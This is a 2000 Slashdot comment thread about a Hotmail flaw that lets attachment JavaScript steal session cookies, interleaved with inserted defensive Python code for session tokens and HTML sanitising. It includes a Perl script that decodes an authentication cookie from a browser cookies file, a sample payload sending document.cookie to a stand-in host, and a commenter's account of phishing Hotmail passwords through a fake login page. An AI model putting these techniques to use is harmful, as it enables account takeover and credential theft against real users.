Another Hole in Hotmail
Ancipital noted that a new hotmail hole has sprung up. This one is, like the ILUVYOU bug, a VBS macro attachment that must be executed by people with very (ok, who does this, huh? I mean, viewing a gif or clicking a URL, but running a strange program? The mind boggles).
Maybe they were overwhelmed by dialog boxes popping up and were just doing whatever it took to make the dern thing go away.
The clearance system sounds logical. It is not. It is completely arbitrary. -- John Bolton
About six months (mainly as a spamcatcher) and I quit using it when it became necessary to have javascript enabled to access my account. I have the nasty stuff turned off in Netscape.
~REZ~ #43301. Who'd fake being me anyway?
When you look at pop culture, and other countries leaders, it's obvious that most people are that stupid. I'm surprised the result wasn't higher.
--
On a very similar idea, you could also have a form with the explanation, in which it was said at the end to type "yes" or "no" into a text box and click okay. Perhaps something short but unique could be used for each different box. I think "virus threat accepted" is a little long; users might make a typo and not figure it out.
E.G.
You are about to format your disk. Formatting your disk will erase all the information on it. Type "format" into the text box and click okay to format. Type "no" or click cancel to stop this operation. Remember, formatting the disk will erase all information on it.
---------------
|                            |
---------------
    [okay]     [no]
-- no
Shouldn't that be Monday OR Friday?
For the online signup stuff, I have a pseudonym that has an e-mail alias on my own domain name that sends incoming mail to /dev/null
Very convenient - I never even see the spam.
Same kind of thing when you go to an AOL chatroom and tell them they can get your pic by pressing ALT+F4, it's been around forever, but the cluebies still fall for it. Idiots. :\
Slashdot poll suggestion:
In order to continue reading the pr0n trolls on Slashdot, you must pour a bowl of hot grits into your hard drive right now, and click OK. Do you wish to continue?
(Glossary: "hard drive" is usually used to denote the secondary storage device on your computer...)
Poll Mastah
I wonder what hotmail does if you check the "remember my password" option..
It probably just sends you the same cookie but with an expires field, so the browser will store the cookie on the hard drive. If the cookie doesn't have an expires field, then it's kept only in memory. If you need to login as a new user, restart the browser.
Of course, if one is going to do something like this over the Internet, it should be encrypted. BTW, slashdot isn't the only one. Linuxtoday.com uses plaintext cookies for authentication also.
the good ground has been paved over by suicidal maniacs
Message I got when deleting my spam bucket:
Message to Hotmail Members
We apologize, but your account is temporarily unavailable. This delay does not affect the entire site or relate specifically to your account, but the machine that holds your account information is temporarily unavailable. We do not expect this delay to last much longer, so please continue to check our site for your account status.
We will do our best to make your account available as quickly as possible. We appreciate your support, and sincerely apologize for the inconvenience.
© 2000 Microsoft Corporation. All rights reserved. Terms of Service Privacy Statement
"`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
Naah, no-one would be stupid enough to embed a plaintext user password directly into an authentication cookie. Well, maybe Microsoft and Hotmail, but no-one who had the slightest clue about the issues Slashdotters care about.
Would they?
#!/usr/bin/perl
# Pull the Slashdot cookie out of a Netscape 4 cookies file and decode it.
# Netscape's cookies file is tab-separated (domain, flag, path, secure,
# expiry, name, value), so the value is whatever `split` leaves last.
use strict;
use warnings;

open my $cookie_fh, '<', "$ENV{HOME}/.netscape/cookies"
    or die "can't open cookies file: $!";
while (<$cookie_fh>) {
    next unless /slashdot/;
    chomp;
    my @args   = split;
    my $cookie = pop @args;
    $cookie =~ s/%25//g;              # drop the URL-encoded '%' sequences
    print pack("H*", $cookie), "\n";  # the rest is hex-encoded text
}
close $cookie_fh;
--
Xenu loves you!
I once read that Wingate was full of holes. You might want to look into that.
Actually, they were infected by the Intelligensia Virus, which causes dumb people to make what they believe to be intelligent, informed decisions..
I hadn't thought about it quite like that. While dialog boxes in Windows are not limited to error messages, maybe they should be.
...and you're right, I run Gnome on my PC at home, and the only dialog box message that I get regularly (that I ignore) is the one that tells me I'm running the Gnome File Manager as root and that I could damage my system if I'm not careful.
I don't use Hotmail. Does it automatically display HTML attachments?
Using an HTML file to execute malicious javascript seems pretty straightforward. Are any of the other web-based email services (Yahoo, Eudoramail, Mac.com, etc) vulnerable to similar attacks?
If your mental age stayed in the single digits, I suppose it could approach a low number, since your IQ is your mental age divided by your physical age.
Try logging on to Hotmail, not touching anything for 30 mins and then clicking on 'read mail'. If they have the server set up sensibly, you'll have to enter your user name and password again.
On the other hand, if Microsoft have done something really really dumb, like including the password in a cookie, then there's really no hope for them.
Hotmail stores your user information in a session cookie, not a persistent (disk) cookie. If you close all your browser windows and access hotmail again, you are required to enter your password again... unlike Slashdot I might note.
I know the session cookie has an expiration period, but I don't remember what it is. Probably something like 20 minutes.
-konstant
Yes! We are all individuals! I'm not!
HTML and RTF allow us to format email far more effectively than plain text ever will. Shouldn't we just make them more secure?
You use RTF for email? HTML -- if stripped down to the most basic tags -- I can understand, but why RTF?
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
I thought this story was quite. Besides being, it was to read! I wonder why Microsoft can't get off, and implement.
This is not, the JavaScript exploit in existence! Microsoft should, otherwise the users. The mind boggles.
But then again, I rarely. So who. Well!
I got a Hotmail account years ago (my first email account, and before MS bought Hotmail). I still have it, although I don't use it that often. I really only use it as an alternate account during the summer, since my school account won't let me log in from a different server, and because several of my friends keep sending me stuff at that address even though I keep giving them the new one.
---
Zardoz has spoken!
Oper on the Nightstar
Right?
Not everyone knows the difference. They see the attachment and click. After the last one, I sent an explanation of how to figure out what kind of file the attachment is (by looking at the extension) and why it's important to know before you click on it.
Since I support a hundred-plus windows users, I'm not really surprised that people don't know this. I'm sort of irritated, though, that if I don't tell them stuff like this, they aren't going to learn it anywhere else. The programs don't have little warning screens about it, and no one will ever RTFM, so they're stuck. Good thing we don't use Outlook here, eh? We still got last week's virus, but only two people lost
-jpowers
It seems to me that it would be fairly trivial to embed an ActiveX component in an HTML email, to mess with people who read their mail with ActiveX-enabled software (Hotmail via MSIE, Outlook, etc.). Since ActiveX is just plain-vanilla binary executables with the most minimal security imaginable, it could do all sorts of unpleasant things when viewed. It could, for example: propagate itself (by interfacing with Outlook), embed itself into every HTML file on the user's hard drive, embed itself into all outgoing HTML mail (in which case it could become nearly uncatchable), send all sorts of info over the net, install backdoors, etc. I'm surprised it hasn't been done already.
---
Zardoz has spoken!
Oper on the Nightstar
It is not a matter of educating people. We will never be able to educate everyone enough. People will always be stupid. Even if you are the smartest person, you still do remarkably stupid things. I have yet to meet the person that can not quickly think of at least 5 times they did things that any rational person would comment as completely stupid. As for people clicking in an email: for most users a computer is as much of a magic creation as the internal combustion engine. How many drivers know exactly how their car works and can repair it? These computer users are the same ones that repeatedly send forwards on because if they send it to 200,000 people Timmy will receive millions in health care and they will see a cool qt movie on their pc. People do stupid things. We will continue to do stupid things. Therefore education helps, but people will always click a button if the pros seem to outweigh the possible negatives. Or even if it is just in front of them. just my one cent.
I am 31337 or something.
you see, this is the problem with the world today. everyone is so concerned with the format and correctness of everything, not of what it is trying to tell you. it doesnt matter one bit if his grammar is wrong, if he spells something wrong, etc, its just being anal about something so completely insignifigant that brings nothing but stress to everyone. get over it, it not going t affect your life if someone talks differently then you do, and if it does, your life must not be worth that much.
point in case, my lack of capitals and most punctuation, i hope it gives you nightmares.
-Malachai
-Sometimes i want to masturbate but then i feel that i dont deserve myself.
We've had the same here in Luxembourg where a local radio station reported that ILOVEYOU had destroyed millions of computers (Did their CPU explode?) but completely forgot to mention that one could just delete the mail without launching the attachment and that's it.
They also said that there were no Antivirus tools available that could detect VBS.LoveLetter which was just plain wrong, as I had downloaded updates for InnocuLAN, McAfee, Norton AV and AVP about 2 hours before their report.
Hmm - a tip. When looking for karma, try getting your facts right. As anyone who reads
---- Den ene knappen er powerknapp, den andre er Bender voice knapp "Bite My Shiny Metal Ass"
The point was that people don't read the dialog.
;), but normally it is not what you want. The point of the poster you replied to was that the user doesn't need to know that formatting is bad and thus you don't know for sure 1 out of 3 users don't read dialog boxes.
Yes, but the point was that users *might* think that formatting the HD is a good thing. Sometimes it is, when you detect Windows on it, to install OS blablabla
Thimo
--
Avoid the Gates of Hell. Use Linux!
... is that most users don't know that other extensions than .exe can actually run "a programme". So even if they did see .js or .vbs they wouldn't even know not to run it. For most users, the only way to find out what type a file is, is to double-click.
I think he was about to say "with very small cranial cavities", but I could be wrong.
-- Cisk for the Cisk God
Err actually both are not necessarily true. It is not difficult to find a situation where (a) the engine speed will decrease or remain constant; and (b) the speed of the car will decrease or remain constant when you floor the gas pedal (e.g. while going up a steep hill with a small engine or heavy load).
The name "accelerator" is a bit confusing because it implies that it will cause your car to accelerate. More often than not, it's used to keep your car at a constant speed, and oftentimes it will be used to slow the car down. Most people wisely don't call it an "accelerator".
Rather, most people call it a "gas pedal" and likewise use phrases like "giving it some gas" and "laying off the gas". This to me shows that they have a very good understanding of what the pedal does: it allows more gasoline into the fuel mixture. Also, it would seem that most people will not expect the gas pedal to cause any sort of positive acceleration when going up a steep hill (for example), so I'd say your assumption that most people just expect it to speed up the car is false. Also, your assumption that it doesn't matter would also seem to be false, otherwise extreme confusion would ensue when people would drive in hilly or mountainous parts.
This may seem off-topic, but it's not. Would it be too much to ask to give the populace at large the benefit of the doubt? Most people know what's going on with most things, and they don't need it to be overly dumbed down. The worst case of this is retarded software companies who make programs that mimic real-life devices in order to presumably make it "easier to use" (examples are CD players which look like real CD players, chat programs which look like telephones, e-mail programs which make analogies to snail mail protocols). Oftentimes, the program will come out extremely crippled, and pretty much inferior in every way to its competitors. Also, it comes out being a little bit condescending, which I'm sure can't help its sales. People know that an increase in gas in the fuel mixture in their car causes an increase in power because they've experienced it, not because there's a sticker that says "speed" or any such nonsense pasted on to it.
Just the addition of an IP address encoded as part of the session key will block out *most* of the people who could grab your cookie for this hack. The only ones it doesn't affect are those with the same IP address as the unsuspecting Hotmail user, which would occur if the Hotmail user was behind the same proxy as the perpetrator. It's an easy change to make, since they are (assumedly) already going back to verify the session key in some respect.
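The IP-bound session key suggested here, together with the expires-field difference between a persistent and an in-memory cookie described earlier in the thread, as an added example in Python. This is not Hotmail's code: the server key, the cookie name HMSession, the 30-minute idle timeout and the token layout are all assumptions. The server signs the session id, user, client IP and expiry with an HMAC, so a cookie copied out of a browser is rejected from any other address and after the timeout, and the Set-Cookie builder shows that only the Expires attribute makes the browser write the cookie to disk.

```python
"""Session tokens that carry their own expiry and the client IP they were issued to.

Added example (not Hotmail's code): a stolen cookie is only accepted from the same
address and only until the idle timeout passes.
"""
import base64
import binascii
import hashlib
import hmac
import secrets
import time

SERVER_KEY = b"constructed-demo-key-rotate-in-production"  # assumption: secret held only by the server
SESSION_TTL = 30 * 60                                      # assumption: the 30-minute idle timeout guessed at in the thread
COOKIE_NAME = "HMSession"                                  # constructed cookie name


def _sign(payload: bytes) -> str:
    return hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()


def issue_token(user: str, client_ip: str, now: int) -> str:
    """Build 'base64(session_id|user|ip|expires).hmac'.  The random id means two
    logins never share a token; the HMAC means the client cannot edit the fields."""
    session_id = secrets.token_hex(16)
    expires = int(now) + SESSION_TTL
    payload = f"{session_id}|{user}|{client_ip}|{expires}".encode()
    return base64.urlsafe_b64encode(payload).decode() + "." + _sign(payload)


def verify_token(token: str, client_ip: str, now: int):
    """Return the user name for a genuine, unexpired token presented from the IP it
    was issued to; otherwise None (the caller should treat None as 'log in again')."""
    try:
        encoded, mac = token.split(".", 1)
        payload = base64.urlsafe_b64decode(encoded.encode())
    except (ValueError, binascii.Error):
        return None
    if not hmac.compare_digest(_sign(payload).encode(), mac.encode()):
        return None                       # forged or edited token
    try:
        _, user, ip, expires = payload.decode().split("|")
    except ValueError:
        return None
    if int(expires) < now:
        return None                       # idle timeout passed: force re-authentication
    if ip != client_ip:
        return None                       # replay from another address (same proxy still passes, as noted above)
    return user


def set_cookie_header(token: str, remember_me: bool, now: int) -> str:
    """Without Expires the browser keeps the cookie in memory only; with it, on disk.
    HttpOnly (an attribute that postdates this thread) keeps page script from reading it."""
    attrs = [f"{COOKIE_NAME}={token}", "Path=/", "Secure", "HttpOnly"]
    if remember_me:
        when = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(now + SESSION_TTL))
        attrs.append("Expires=" + when)
    return "Set-Cookie: " + "; ".join(attrs)


if __name__ == "__main__":
    now = int(time.time())
    tok = issue_token("alice", "203.0.113.5", now)       # constructed user and address
    print(set_cookie_header(tok, remember_me=False, now=now))
    print(verify_token(tok, "203.0.113.5", now))          # alice
    print(verify_token(tok, "198.51.100.9", now))         # None: different address
    print(verify_token(tok, "203.0.113.5", now + 3600))   # None: expired
```

The server stores nothing per session here; everything it needs is inside the signed token, which is why the verification step the comment mentions ("going back to verify the session key") is enough to enforce both the address and the timeout.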
Write a Javascript embedded in an HTML that automatically sends the reader to another website. How much damage can you do to a person's PC once they get to a website? Especially with Java or VB/JavaScript?
The problem would be that it wouldn't take long for the site to get shuttered and the manhunt would be on. Perhaps.
If you aren't part of the solution, there is good money to be made prolonging the problem
Unfortunately, software requires you to make decisions, and dumbly clicking on "OK" all the time is seen just as a quick way to make the problem go away. Unfortunately, it's not the case. Ideally, the user interface of an application should be engineered and designed to stay flexible, intuitive and easy to learn while popping up the minimum number of questions. These goals cannot be accomplished all the time for every situation. In such cases, where the full attention of the user is needed, I'd suggest forcing him to use a different input device in order to proceed than the one he usually uses. Today it would mean that you'd have to require confirmation via keyboard (perhaps requiring the user to type an extensive `yes' instead of a simple `y', or whatever). I know this may be a source of troubles, but I don't see alternatives if questions can't be avoided.
I developed it on paid time, it was company property. I didn't keep a copy (I don't use Windows at home for anything but games, so I wasn't tempted).
I was pretty sure it would spread to millions of computers, and I'd get a bonus. Instead I got a pat on the back from the guy in the next cubicle (who didn't install the software either), and the company refused to hire me as a regular employee when my co-op term ended (despite demonstrated ability as one of their best programmers, and their desperate need for a rewrite of an in-house package I was intimately familiar with, I was "unqualified" without a degree). Very disappointing.
I also don't use Lookout Express.
Yea.. it sure does! Also provokes a swearing response and a tendency to scream if something important is being worked on .. well, it does from me as it's FAR too frequent with my machine running Nice Try SP6 .. i.e. it actually happens. Only time I saw Linux kernel panic was when I had a machine with a dodgy simm socket and half the machine's memory just 'disappeared'.. kinda understanding it would get upset..
Anyway.. I digress.
--
Delphis
What they are really suggesting is that Microsoft should bundle anti-virus software with Windows and Outlook. Seems to me that the bundling issue got you guys into a bunch of trouble already.
You can't have it both ways folks. If you are going to split Microsoft in two for bundling software, you can't demand that they bundle more software to protect from virii.
Ugh. Expecting anything but bigoted bullshit about Microsoft from /. is asking too much, it seems.
No, Thursday's out. How about never - is never good for you?
the tricky part about this is that you don't need to click on the attachment. Hotmail, just like many of the other newer email clients, recognizes it as html code, and embeds the html page into the page automatically. Unless you've changed settings, this will happen without you actually doing anything.
it's not a vbs file. it's an embedded javascript. there is no virus check run because it's not a virus and there isn't an anti-virus that checks for potentially malignant javascript. Hell, the creator only had to identify the cookie, the username, and the server the cookie was being held on, and automatically send all of this info to another account (which could have been a hotmail account)
Not everyone had to actually open the attachment.
No lie, I work on a college campus with PhD's who will open anything...we had several people run the ILOVEYOU .exe without even thinking twice about it, and then they piss and moan when I tell them it will be a day or two before I can find the time to come out and rebuild their machines.
ID10T's....all of 'em.
if electricity is created by electrons, is morality created by morons?
I tried this thing on my Yahoo mail account and it changed the <script> tag to <cursive>
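Renaming a tag, as the comment above describes Yahoo doing, is one way to neutralise it; the alternative, shown here as an added Python example that is neither Yahoo's nor Hotmail's code, is to rebuild the mail body from an allow-list and discard everything else. The tag and attribute lists are assumptions about what a web-mail display needs. Script, style, iframe and object subtrees are removed with their contents, no on* handler or style attribute can pass because only named attributes are copied, and href values are checked after stripping the whitespace and control characters that are used to disguise a javascript: scheme.

```python
"""Allow-list sanitizer for HTML mail bodies (added example, not Yahoo's or Hotmail's code).

Rather than renaming dangerous tags, the document is rebuilt from a short list of
harmless tags and attributes; anything not on the list is dropped.
"""
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "font"}                      # assumption: what a mail UI needs
ALLOWED_ATTRS = {"a": {"href"}, "font": {"color", "size", "face"}}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "applet"}
VOID_TAGS = {"br"}
SAFE_SCHEMES = ("http:", "https:", "mailto:")
_CONTROL = re.compile(r"[\x00-\x20]")   # bytes used to disguise "javascript:" as "java\tscript:"


def _safe_href(value: str) -> bool:
    """Accept relative links and the three allowed schemes; reject javascript:, data:, vbscript:, ..."""
    normalized = _CONTROL.sub("", value).lower()
    return ":" not in normalized or normalized.startswith(SAFE_SCHEMES)


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_tag = None      # tag whose whole subtree is being discarded
        self.skip_depth = 0       # nesting of that tag inside itself
        self.open_counts = {}     # allowed tags currently open, so no stray end tags are emitted

    def handle_starttag(self, tag, attrs):
        if self.skip_tag:
            if tag == self.skip_tag:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_tag, self.skip_depth = tag, 1
            return
        if tag not in ALLOWED_TAGS:
            return                 # unknown tag (div, img, cursive, ...): drop the tag, keep its text
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue           # silently drops every on* handler and style=
            if name == "href" and not _safe_href(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_counts[tag] = self.open_counts.get(tag, 0) + 1

    def handle_endtag(self, tag):
        if self.skip_tag:
            if tag == self.skip_tag:
                self.skip_depth -= 1
                if self.skip_depth == 0:
                    self.skip_tag = None
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS and self.open_counts.get(tag, 0):
            self.open_counts[tag] -= 1
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_tag:
            self.out.append(escape(data, quote=False))   # text is re-escaped, so "<" in text stays text

    def handle_comment(self, data):
        pass                       # comments (including IE conditional comments) never pass through


def sanitize_mail_html(source: str) -> str:
    parser = MailSanitizer()
    parser.feed(source)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # constructed sample: the cookie-stealing pattern described in the thread, plus a disguised link
    sample = ('<p>Hi <b>there</b><script>location="http://evil.invalid/?"+document.cookie'
              '</script></p><a href="java\tscript:alert(1)" onclick="x()">link</a>')
    print(sanitize_mail_html(sample))   # <p>Hi <b>there</b></p><a>link</a>
```

Because the output is regenerated from parsed tokens rather than patched in place, an attachment that relies on malformed markup to smuggle a tag past a search-and-replace has nothing left to exploit: what the parser did not recognise as an allowed tag simply is not written back out.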
OK, so bashing hotmail.com in /. is pretty easy, but there is one single aspect that I think makes hotmail the best free web-based e-mail service: they do close spam generating accounts or drop-in box accounts. You guys in this thread seem not to pay much attention to this.
I used to receive about 5 spam messages a day and never have I sent a complaint with a full header to abuse@hotmail.com I got spam from the same address again. I can't say the same about any other web-mail.
Many people don't understand the ramifications of actions online. Just like long ago on AOL, even though there was a warning label on everything, people still gave away their Screen names and passwords.
If you insist on designing software services so easy that an idiot can use them, then expect idiots to use them. Now couple this with a need to "innovate", ie force out upgrades to software with features that people don't need then what do you expect?
What kind of grammer is that?
With very what?! Egads.
Linux Band Bratwurst Orange
Beos Band XIR: Xir is recursive
when Push Comes to Shove
Except that all news clients I know display the extension anyway, so you'll have to save the file and open the folder you saved it to in order to have the extension hidden
Not exactly the same, is it ?
Not a bias, just good common sense.
--
Seth
$5 / month hosted VPS on linux = awesome!
I was nothing short of amazed at how many people clicked OK. It must have been at least a third, if not half.
Got Rhinos?
From the ZDNet article:
Bennett Haselton, Webmaster for Peacefire.org, said the flaw involves sending a user an e-mail with an HTML attachment. When the user clicks on the attachment, the file sends a copy of the user's cookie to the hacker.
Once that cookie is received, the hacker can insert it manually into the Netscape cookies.txt file and use that authentication key to log in to Hotmail as the user. Click here for a description of the trick.
<snip>
Not a 'trivial bug'
Since the cookie does not contain the user's password, the hacker can only access the account when the user is logged on and as long as the authentication code is valid. But Haselton said that five minutes would be long enough for a hacker with a prepared script to download all of a user's e-mail messages.
Best I could see, there's no email floating around doing this - it's just an idea at this point. And for it to propagate(sp?) like luvbug or melissa, it'd need a script to use the hotmail address book. As it sits right now, it'd just come from one guy who knew lots of hotmail addresses. Someone correct me if I'm wrong on this, tho :)
-----
If Bill Gates had a nickel for every time Windows crashed...
"I'm sure the manual will indicate which lever is the velocitator, and which the decelleratrix..."
- C. M. Burns
clearly that is not true. 35% of all statistics are just made up anyway
Initialize works well...
Cris E
St. Paul, MN
What I saw made me laugh over and over again. The news people on almost every channel gave the following advice.
1.) If you get an e-mail that your not expecting (hmmm all of them!) call the person and ask them if they sent you mail.
Why don't you just drive over to their house and ask them.... DUH!
2.) Make sure your virus software is up to date.
Hello! This didn't work and wouldn't work because this was a NEW virus. They had a virus definition only hours after the bug hit! What good would it have done!
Linux is only free if your time has no value. Windows is only free if you threaten to use Linux.
Or customer service.
Good job!
A choice of masters is not freedom
Maybe you should read up on the facts. She was the passenger in a car... the driver pulled over so she could add stuff to her coffee, she took off the lid and it spilled on her. The issue was that the coffee is way hotter than it should have been, but she still should have been more careful.
-- Dr. Eldarion --
It's not what it is, it's something else.
Today I downloaded all the headers from my snotmail account. 1210 new messages! arrgh. . . .
mountvol \\?\brain{dbe069b1-65ae-11d5-bab4-806d6172696f}\h
You're right, it is the MAIL server's job to send/receive e-mail. However, with web based e-mail, the WEB server basically has to act as your e-mail client. If that was left up to the browser, the browser would have to be written to work with every online mail service AND each time the inevitable hole is found, you'd have to download a new browser.
kwsNI
...but what about folks who defrag their hard drive every time they get a javascript run error.
I'm on the fence between ease of use and mandatory education. (Mostly cuz I drive a car but couldn't tell you how it works...pot calling the kettle, eh?)
The Divine Creatrix in a Mortal Shell that stays Crunchy in Milk
The House Between - Original Sci-Fi Series
that is alot of dialog boxes
Having worked in an all M$ shop for the last three weeks, I can tell you that you are right. Many of the users do not know what formatting is. I can also tell you that most will click or run just about anything! 1 of 3 is a low ball estimate for where I work. Those people and myself generally read no further than OK. Woops, it blew up, so what? Application reliability is terrible to begin with and most people have just given up. Their powerlessness has been demonstrated again and again as reasonable applications were replaced with MS counterparts. With their power to choose went all feelings of responsibility. They have given up.
If you click here a message declaring your love for Bill Gates will be posted to Slashdot in your name.
Any takers?
numb
Uh they can't be true. Hotmail accounts are deleted after 3 months (or is it 4?) of non use.
Ok, while I disagree with your point in general, I will concede that it is the meaning of a sentence that makes the most difference. However, a trailing adjective/adverb that modifies nothing is a problem anyone can be justified complaining about. This is why it bothers us when we see stories that have sentences that just
I know. Switch to full screen mode with blue background and display your warning in white text. That never fails to provoke a knee-jerk reaction.
isn't this related to the Trojan Horse Issue that the ZOPE guys posted yesterday?
That way I have something to point to when someone asks me if it's OK to open email attachments. Doesn't work too well over the phone, but I'm sure I could make use of a suitable GIF on the web server..
73 de N5VB (ex-KD5BIV) AR SK
That's an easy opinion to take when you're young, but when you have to join the real world and effectively communicate with those around you it just doesn't cut it. If you can't get your point across in an acceptable dialect, people will ignore you or make fun of you. While you may think that's wrong, proper spelling and grammar (which I do not claim to always follow to the letter) are two areas of conformance I agree with.
If you don't think it matters, watch how many people comment when CmdrTaco or one of the others uses atrocious spelling and/or grammar. While it may be acceptable in certain communities (such as this one, to a degree), try turning in a paper to a professor or a design document to your boss and see how far it flies.
I disagree; it doesn't have to act as a client. It presents the data to the browser, which is the acting client. I guess if you want to get wild about it, it could be a client as much as pop3 is a client; their job is to get data to and fro, not inspect and decide what you get. (Maybe I'm just an old crusty bastard but that's the original intention of mail and I'm sticking to it.)
The problem with your suggestion is that these exploits don't only work for Hotmail: because the client readily accepts them, any other site can send bad javascript to you. If the client prevented you from executing bad code to begin with, there could be 20 billion new exploits, but if your browser didn't run them, not only would your Hotmail account be fine, all the other sites one goes to wouldn't have to be worried about either.
Folks at MS should have known better than leaving attachments unprotected like that. They should compile attached html files into word documents or something :)
Listen, this is not really a new bug, this has been there for a while. A couple of months ago I used JavaScript and my school account to collect some passwords from some unsuspecting users of HotMail. It was very easy. The attached HTML had JS that reloaded the parent page not from HotMail but from my own server (I just copied the entire page); most people did not notice that the URL does not belong to MS, they decided that Hotmail threw them out and they tried to relogin. A script on my server read the password and the user name, then sent back a page with the password and username and 'onload' submitted that info to the MS servers (this way the user actually logged into their hotmail accounts but I still had their passwords). The trick was to control the parent window; for some reason the exploit only worked in Netscape 4.x, not in IE.
Well, there is always next time.
You can't handle the truth.
http://www.washingtonpost.com/wp-dyn/articles/A37362-2000May9.html
C'mon 'boys'....
Wonder if there is a contract with Katz involved....
Blar.
Here's the exploit:
1) Find a story about technology (if your name is "Katz" this step is unneeded)
2) Skim the headline of said story to "get the gist".
3) Submit story to Slashdot, paying special attention to making it seem like this story is related to some hot topic.
For instance, if the story is about a misconfigured website allowing a security breach, make it seem like the story is related to a recent email worm by working "email" and "Visual Basic Scripting" in there somehow.
What's the effect of this exploit: In all the excitement of having another Microsoft bashing story will hurriedly type your submission onto the front page with plenty of spelling errors and word omissions.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
I use mine only to sign up for anything online.
Basically, all it ends up being is an online junk mail repository! (which I rarely ever bother to check)
-WD
How this seems to work is that someone emails you an HTML file as an attachment.
If you then view the attachment through Hotmail, Javascript in that attachment can then pretend to be from the Hotmail domain, and therefore access any cookies that Hotmail has set up. It can then submit these values to a form on another, hostile, server.
These cookies then allow access to the site from a user pretending to be you, allowing them to read and delete your emails or send email from your account.
It's not clear from the article, but presumably the relevant cookie is the one holding the user's session key. In a typical implementation this key will be useless after 30mins or so, but the length of the timeout is really whatever Microsoft chooses it to be.
Try logging on to Hotmail, not touching anything for 30 mins and then clicking on 'read mail'. If they have the server set up sensibly, you'll have to enter your user name and password again.
On the other hand, if Microsoft have done something really really dumb, like including the password in a cookie, then there's really no hope for them.
-Ciaran
Think of how dumb the average person is. By definition, half of the population is dumber than that...
Technically, wouldn't that be the median?
One more drink, and I'll move on. --Dave Matthews Band
Ah. I feel MUCH better now! Now I have to go delete some email before I lose my cookies! <grin>
I just want to take over the world...Why does that automatically make me EVIL?
This reminds me of the problems one might have ensuring that a "clickwrap license" is read and agreed to by the consumer. The traditional method of ensuring that the agreement is actually read is to disable the OK button until the user has scrolled through the license. But how can you ensure that a reader actually reads what's scrolling past? I propose a multiple choice reading comprehension exam.
Request to rename Hotmail into Holemail (other variations such as Crackmail are accepted)
You can't handle the truth.
Perhaps this hole explains why Hotmail is down.
Could they actually be fixing the problem? Naaah.
Here's the message one gets on login:
"We apologize, but your account is temporarily unavailable. This delay does not affect the entire site or relate specifically to your account, but the machine that holds your account information is temporarily unavailable. We do not expect this delay to last much longer, so please continue to check our site for your account status.
We will do our best to make your account available as quickly as possible. We appreciate your support, and sincerely apologize for the inconvenience."
I run outlook in a largish corporation. If you want, I can give you a list of a few hundred people that click on strange attachments.
-- It is too late for the pebbles to vote, the avalanche has already started.
There have been enough well-publicized problems with internet email that everyone with a brain knows they are not secure. Doesn't everyone just use their hotmail accounts to enter on website forms, so they don't get spammed so much?
Saying "hotmail has security holes" is like saying the sky is blue.
Don't forget that Friday is Hawaiian shirt day.
They still bias the average over the median. It might not be much, but still...
Think of a population of 3: two have an intelligence value of 1 (any metric) and one has value 1.5. Now the average is 1.166666 and 66% is below that! Not by much, but it is below! What I am stating is that the two tails are not symmetric and the net result is a median (slightly) lower than the average. Thus we have that more than 50% of the population is below average! Not by much, but below.
uh. Why do people even use hotmail? Last I checked, everyone and their grandma has some free email service.. mail.yahoo.com, excite, etc.
Um....? Why log in at all?
Female Prison Rape in NY
pronoblem
And the flipside to this:
Why do we need more than plain text for email?
I like email to appear in the standard fonts and layout *I* want, not what somebody on the other end of the line thinks is cool. I don't want to waste the time downloading the extra bloat for HTML. I don't want this bloat replicated to the hundreds of people that subscribe to the mailing lists I run. I don't want the PINE users who subscribe to the lists bitching endlessly at me because they're getting HTML attachments.
Conformity to standards brings efficiency.
If something needs formatting, that's what attachments are for.
Adam
Anyone who falls for something like that DESERVES to face the consequences...
if they didn't learn all the times that the services say "DON'T GIVE YOUR PASSWORD OUT TO ANYONE", then maybe that will teach them a lesson.
-- Dr. Eldarion --
It's not what it is, it's something else.
To you and me, formatting means erasing. But that's only true in techno-speak. In every other context, the word "format" does not imply erasing - not at all! And since very few people actually format their hard drives (and hence, have no experience with the process), how can you expect them to know what that word means?
When you "format" something, you arrange it. You put it into some kind of order. To most people, that's a good thing! The moron who decided that "format" is a synonym for "erase" should be shot.
If your application had asked the user to "erase all files on your hard drive", I think very few people would have said yes.
And the men who hold high places must be the ones who start
To mold a new reality... closer to the heart
An economy built on 20 years of incompetence won't go down without a fight. Security and vulnerability of MS OSes is today just as big an issue as when I first encountered the Jerusalem virus in 1988. Where is the innovation now, MS?
XML causes global warming.
I wonder how many people fell into that trap, thinking they were gonna get into someone else's account.
Got Rhinos?
I used it for a while when I was travelling a lot (to grab my home POP3 mail, work has MS Exchange with Web Access, which is the dog's danglies..), now my ISP has a decent webmail interface and I only use HoTMail for testing accounts etc, and for MSN Messenger.
McC
You can educate people until you're blue in the face. Only those who want to learn will learn. When I was a sysadmin, there was a certain collection of individuals that would ALWAYS need help changing their passwords when they expired. No amount of education could make the difference. FYI: Some of these people had Master's degrees.
The Windoze default setting is to 'hide' the three letter file extension. If the attached file was named noodiepic.jpg.vbs, it would appear as noodiepic.jpg. Most people would feel safe (yet perverted) by opening this.
After our beloved NTServer was 'Loved', the people with this setting only noticed the jpg icons had changed and kept infecting away. I changed this setting on all infected users to help remind them what file type it actually is.
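The extension-hiding trick described in this post, as an added example (not code from any poster): a small Python checker that models what Explorer would display for an attachment name and flags the double-extension case, plus extensions Explorer never shows at all. The extension sets and sample names are assumptions constructed for illustration.

```python
"""Flag mail attachments whose true type is masked by Windows' default
"Hide file extensions for known file types" setting, as described in this thread.

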